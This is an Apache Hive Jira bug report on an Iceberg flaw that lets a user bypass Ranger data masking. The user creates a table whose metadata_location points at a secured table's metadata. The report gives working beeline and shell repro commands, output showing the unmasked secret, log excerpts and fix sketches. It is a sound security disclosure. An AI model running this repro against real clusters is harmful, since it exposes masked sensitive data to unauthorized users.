Janos Kovacs created HIVE-27713:
-----------------------------------
Summary: Iceberg: metadata location overrides can cause data breach
Key: HIVE-27713
URL: https://issues.apache.org/jira/browse/HIVE-27713
Project: Hive
Issue Type: Bug
Components: Authorization, Iceberg integration
Affects Versions: 4.0.0-alpha-2
Reporter: Janos Kovacs
Assignee: Ayush Saxena
Set to Bug/Blocker instead of Enhancement due to its security-related nature:
Hive 4 should not be released without a fix for this. Please reset if needed.
Context:
* There are some core tables with sensitive data that users can only query
with data masking enforced (e.g. via Ranger). Let's assume this is the
`default.icebergsecured` table.
* As expected, an end user can only access the masked form of the sensitive
data.
* Users also have the privilege to create new tables in their own sandbox
databases; let's assume this is the `default.trojanhorse` table for now.
* The user can create a malicious table that exposes the sensitive data
unmasked, leading to a possible data breach.
* Hive runs with doAs=false so that it can enforce fine-grained access control
(FGAC) and so that end users do not need direct file-system access.
Repro:
* First, make sure the data is protected by the masking policy:
{noformat}
<kinit as privileged user>
beeline -e "
DROP TABLE IF EXISTS default.icebergsecured PURGE;
CREATE EXTERNAL TABLE default.icebergsecured (txt string, secret string) STORED BY ICEBERG;
INSERT INTO default.icebergsecured VALUES ('You might be allowed to see this.', 'You are NOT allowed to see this!');
"
<kinit as end user>
beeline -e "
SELECT * FROM default.icebergsecured;
"
+------------------------------------+--------------------------------+
| icebergsecured.txt | icebergsecured.secret |
+------------------------------------+--------------------------------+
| You might be allowed to see this. | MASKED BY RANGER FOR SECURITY |
+------------------------------------+--------------------------------+
{noformat}
* Now let the user create the malicious table that exposes the sensitive data:
{noformat}
<kinit as end user>
SECURED_META_LOCATION=$(HADOOP_CLIENT_OPTS="-Djline.terminal=jline.UnsupportedTerminal" \
  beeline -e "DESCRIBE FORMATTED default.icebergsecured;" 2>/dev/null \
  | grep metadata_location | grep -v previous_metadata_location | awk '{print $5}')
beeline -e "
DROP TABLE IF EXISTS default.trojanhorse;
CREATE EXTERNAL TABLE default.trojanhorse (txt string, secret string)
STORED BY ICEBERG
TBLPROPERTIES (
'metadata_location'='${SECURED_META_LOCATION}');
SELECT * FROM default.trojanhorse;
"
+------------------------------------+-----------------------------------+
| trojanhorse.txt | trojanhorse.secret |
+------------------------------------+-----------------------------------+
| You might be allowed to see this. | You are not allowed to see this! |
+------------------------------------+-----------------------------------+
{noformat}
Currently (after HIVE-26707), the RWSTORAGE authorization URI contains either
the dummy path or the explicitly set metadata path:
{noformat}
Permission denied: user [oozie] does not have [RWSTORAGE] privilege on
[iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ftrojanhorse%2Fmetadata%2Fdummy.metadata.json]
Permission denied: user [oozie] does not have [RWSTORAGE] privilege on
[iceberg://default/trojanhorse?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Ficebergsecured%2Fmetadata%2F00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json]
{noformat}
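The authorization URIs in these messages appear to follow the pattern iceberg://<db>/<table>?snapshot=<percent-encoded metadata path>. Below is a minimal shell sketch that reproduces this observed format, which can help compare what the authorizer was asked to check against the table's actual metadata_location. The function name iceberg_auth_uri is hypothetical (not a Hive API), and two assumptions are inferred only from the messages above: the snapshot parameter carries just the path component, and '/' is the only character that needs encoding for these paths.

```shell
#!/bin/sh
# Hypothetical helper (not a Hive API): rebuilds the authorization URI
# format observed in the RWSTORAGE denial messages.
iceberg_auth_uri() {
  local db="$1" table="$2" metadata_path="$3" rest encoded
  # Assumption: only the path component is used, so drop any
  # scheme://authority prefix such as hdfs://host:8020.
  case $metadata_path in
    *://*)
      rest=${metadata_path#*://}
      metadata_path=/${rest#*/}
      ;;
  esac
  # Assumption: '/' is the only character that needs percent-encoding
  # for the paths shown in this report.
  encoded=$(printf '%s' "$metadata_path" | sed 's|/|%2F|g')
  printf 'iceberg://%s/%s?snapshot=%s\n' "$db" "$table" "$encoded"
}
```

For example, `iceberg_auth_uri default trojanhorse /warehouse/tablespace/external/hive/trojanhorse/metadata/dummy.metadata.json` prints the first URI from the denial messages above.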
With a custom location, it is not even passed to the authorizer (the
authorization URI below still points to the dummy metadata file):
{noformat}
2023-05-17 19:38:51,867 INFO org.apache.hadoop.hive.ql.Driver: [a49356b4-1b7a-4c9d-9b70-81af12c0465f HiveServer2-Handler-Pool: Thread-253]: Compiling command(queryId=hive_20230517193851_8b9f0ad7-2ae1-4078-b76a-e51c31321b0b): CREATE EXTERNAL TABLE default.policytestth (txt string, secret string) STORED BY ICEBERG
TBLPROPERTIES (
'metadata_location'='hdfs://test.local.host:8020/warehouse/tablespace/external/hive/policytest/metadata/00001-a3e46c1b-318b-4b46-886a-c6ea591f63c1.metadata.json')
...
2023-05-17 19:38:51,898 DEBUG org.apache.iceberg.mr.hive.HiveIcebergStorageHandler: [a49356b4-1b7a-4c9d-9b70-81af12c0465f HiveServer2-Handler-Pool: Thread-253]: Iceberg storage handler authorization URI iceberg://default/policytestth?snapshot=%2Fwarehouse%2Ftablespace%2Fexternal%2Fhive%2Fpolicytestth%2Fmetadata%2Fdummy.metadata.json
{noformat}
Mandatory changes required for securing tables:
* The custom location needs to be passed to the authorizer.
Changes required for usability (e.g. to eliminate the need for a separate
policy for each table):
* The default location needs to be calculated from the default
warehouse/database location.
* CREATE/ALTER with default locations should either not involve RWSTORAGE
authorization or be handled in a special way by the authorizer.
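The two groups of changes above could be combined into one classification step: compute the table's default metadata directory, treat a metadata_location under it as default, and treat anything else as custom, to be passed to the authorizer with its real path. Below is a minimal shell sketch under stated assumptions, not Hive's implementation: the function names path_only and classify_metadata_location are hypothetical, the default layout <base>/<table>/metadata/ is inferred only from the paths in the logs above (other databases may use a different layout), and paths containing '/..' are conservatively treated as custom rather than normalized.

```shell
#!/bin/sh
# Hypothetical sketch (not Hive's implementation) of the proposed check.
# Assumes the default layout <base>/<table>/metadata/ seen in the logs.

# Print only the path component, dropping an optional scheme://authority.
path_only() {
  case $1 in
    *://*) local rest="${1#*://}"; printf '/%s\n' "${rest#*/}" ;;
    *) printf '%s\n' "$1" ;;
  esac
}

# Print "default" if the metadata location lies under <base>/<table>/metadata/,
# otherwise "custom" (a location that would have to go to the authorizer).
classify_metadata_location() {
  local base="$1" table="$2" location="$3" default_dir actual
  default_dir="$(path_only "${base%/}")/$table/metadata/"
  actual=$(path_only "$location")
  case $actual in
    */..*) echo custom ;;             # conservative: any '/..' counts as custom
    "$default_dir"*) echo default ;;  # quoted part is matched literally
    *) echo custom ;;
  esac
}
```

With the paths from this report, creating trojanhorse with the icebergsecured metadata file (/warehouse/tablespace/external/hive/icebergsecured/metadata/00001-f4c2a428-30ce-4afd-82ff-d46ecbf02244.metadata.json) against base /warehouse/tablespace/external/hive is classified as custom, while the dummy path for trojanhorse is classified as default.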
--
This message was sent by Atlassian Jira
(v8.20.10#820010)